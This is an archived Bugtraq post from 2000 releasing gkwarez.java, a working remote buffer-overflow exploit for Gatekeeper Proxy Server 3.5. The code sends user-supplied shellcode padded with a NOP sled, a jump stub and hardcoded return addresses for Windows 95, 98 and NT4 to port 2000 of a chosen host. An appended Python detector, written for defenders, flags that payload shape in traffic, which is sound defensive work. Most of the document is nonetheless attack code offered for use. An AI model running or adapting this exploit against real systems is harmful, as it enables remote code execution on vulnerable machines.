[15774] in bugtraq


The MDMA Crew's GateKeeper Exploit

daemon@ATHENA.MIT.EDU (wizdumb@MDMA.ZA.NET)
Thu Jul 13 20:10:38 2000

Message-Id:  <00af01bfece2$a52cbd80$367e1ec4@kungphusion>
Date:         Thu, 13 Jul 2000 17:48:01 +0200
Reply-To: wizdumb@MDMA.ZA.NET
From: wizdumb@MDMA.ZA.NET
To: BUGTRAQ@SECURITYFOCUS.COM


I covered a flaw in Gatekeeper 3.5 about a month ago. Well, Gatekeeper 3.6 is
out now, and I'm assuming it's fixed, so it's safe to release some exploit
code. Find the Java src and the bytecode attached.

Cheers,
Wizdumb



Attachment: gkwarez.java

/* gkwarez.java by Andrew Lewis aka. Wizdumb
 * <wizdumb@leet.org || www.mdma.za.net || wizdumb@IRC>
 *
 * Remote exploit for Gatekeeper Proxy Server 3.5 (and prior versions?).
 * Written as proof of concept code only - the MDMA crew do not condone
 * illegal activities in any way what-so-ever.
 *
 * This code is now public - Gatekeeper version 3.6 is out. :-)
 *
 * Shellcode is handled plug and play style for flexibility and defence
 * against script kiddies. :) Oh, and coz I'm too dumb to make some and too
 * lazy to find some. :P Also note that nulls in your shellcode are fine for
 * this daemon - just beware of terminating newlines.
 *
 * Greetz to everyone in MDMA, USSRLabs, b10z, and BlabberNet's #hack
 */

import java.io.*;
import java.net.*;

class gkwarez {

public static void main(String[] args) throws IOException {

  if (args.length != 3) {
    System.out.println("Syntax: java gkwarez [host] [shellcode-file] [version]\n");
    System.out.println("Shellcode file is code you want to execute on the host");
    System.out.println("Valid versions are 95 (Win95), 98 (Win98), 3 (NT4/SP3) and 4 (NT4/SP4)");
    System.exit(1); }

  int c;
  Socket soq = null;
  char[] wet = null;
  PrintWriter white = null;
  BufferedReader hellkode = null;

  char nop  = 0x90;
  char[] jmpcode = { 0xE9, 0xF9, 0xEF, 0x90 };

  // Static addys for "call eax" (backwards) - any1 know of more? mail me. :)
  char[] retwin95 = { 0x30, 0x11, 0x71, 0x7F };
  char[] retwin98 = { 0x7B, 0xFF, 0xF7, 0xBF };
  char[] retntsp3 = { 0xC7, 0x5A, 0xFA, 0x77 };
  char[] retntsp4 = { 0x5D, 0x63, 0xF7, 0x77 };

  // Pick the return address for the target version given on the command line.
  try {
    switch (Integer.parseInt(args[2])) {
      case 95:
        wet = retwin95;
        break;
      case 98:
        wet = retwin98;
        break;
      case 3:
        wet = retntsp3;
        break;
      case 4:
        wet = retntsp4;
        break;
      default:
        System.out.println("Version specified invalid: Expecting 95, 98, 3, or 4");
        System.exit(1);
        break; } } catch (Exception e) {
          System.out.println("Version specified invalid: Expecting 95, 98, 3, or 4");
          System.exit(1); }

  try {
    hellkode = new BufferedReader(new FileReader(args[1]));
  } catch (Exception e) {
    System.out.println("Unable to open file: " + args[1]);
    System.exit(1); }

  try {
    soq = new Socket(args[0], 2000);
    white = new PrintWriter(soq.getOutputStream(), true);
  } catch (Exception e) {
    System.out.println("Problems connecting :-/");
    System.exit(1); }

  // Send the shellcode file, NOP-pad up to offset 4096, write the jump stub
  // and return address there, pad with more NOPs, then end the line.
  for (int i = 0; i <= 4800; i++) {
    if ((c = hellkode.read()) != -1) {
      white.write(c);
      if (i == 4096) {
        System.out.println("Shellcode specified is too big (4095 bytes max). Bailing out...");
        System.exit(1); } }
    else {
      if (i == 4096) {
        white.print(jmpcode);
        white.print(wet); }
      else white.print(nop); } }
  white.println();
  System.out.println("Payload sent!"); } }
Attachment: gkwarez.class (base64-encoded bytecode, not reproduced here)
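A defender-side counterpart, added here as an example (it is not part of the post and not Gatekeeper's own code): a small Python detector for the payload shape the exploit above writes to TCP port 2000. The 4096-byte buffer size, the jump stub and the four return addresses are taken from the Java source; the sample traffic is constructed, and the NOP-density threshold is an assumption.

```python
from collections import Counter

NOP = 0x90
BUFFER_SIZE = 4096                      # buffer size implied by the exploit's 4095-byte limit
JMP_STUB = bytes([0xE9, 0xF9, 0xEF, 0x90])
# Return addresses listed in the post, in the byte order they are sent.
KNOWN_RETS = {
    "win95": bytes([0x30, 0x11, 0x71, 0x7F]),
    "win98": bytes([0x7B, 0xFF, 0xF7, 0xBF]),
    "nt4sp3": bytes([0xC7, 0x5A, 0xFA, 0x77]),
    "nt4sp4": bytes([0x5D, 0x63, 0xF7, 0x77]),
}

def analyse_line(line: bytes) -> dict:
    """Score one newline-terminated request line and return its indicators."""
    body = line.rstrip(b"\r\n")
    counts = Counter(body)
    nop_ratio = counts.get(NOP, 0) / len(body) if body else 0.0
    ret_hits = [name for name, ret in KNOWN_RETS.items() if ret in body]
    result = {
        "length": len(body),
        "nop_ratio": round(nop_ratio, 3),
        "jmp_stub": JMP_STUB in body,
        "ret_hits": ret_hits,
    }
    # Require the over-long line plus a second signal (assumed threshold) so a
    # long but legitimate URL in a proxy request is not flagged on size alone.
    result["suspicious"] = len(body) >= BUFFER_SIZE and (nop_ratio > 0.5 or bool(ret_hits))
    return result

def scan_stream(data: bytes) -> list:
    """Split a captured client-to-server stream into lines; return
    (line number, indicators) for every line that looks like the payload."""
    alerts = []
    for n, line in enumerate(data.split(b"\n"), start=1):
        if line:
            info = analyse_line(line)
            if info["suspicious"]:
                alerts.append((n, info))
    return alerts

# Constructed sample traffic: an ordinary proxy request, then a line shaped like the
# exploit's output (4096 NOPs, jump stub, NT4 SP4 address, 704 more NOPs, newline).
BENIGN = b"GET http://example.test/ HTTP/1.0\r\n"
SLED_LINE = (bytes([NOP]) * BUFFER_SIZE + JMP_STUB + KNOWN_RETS["nt4sp4"]
             + bytes([NOP]) * 704 + b"\n")

if __name__ == "__main__":
    for lineno, info in scan_stream(BENIGN + SLED_LINE):
        print(f"line {lineno}: {info}")
```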
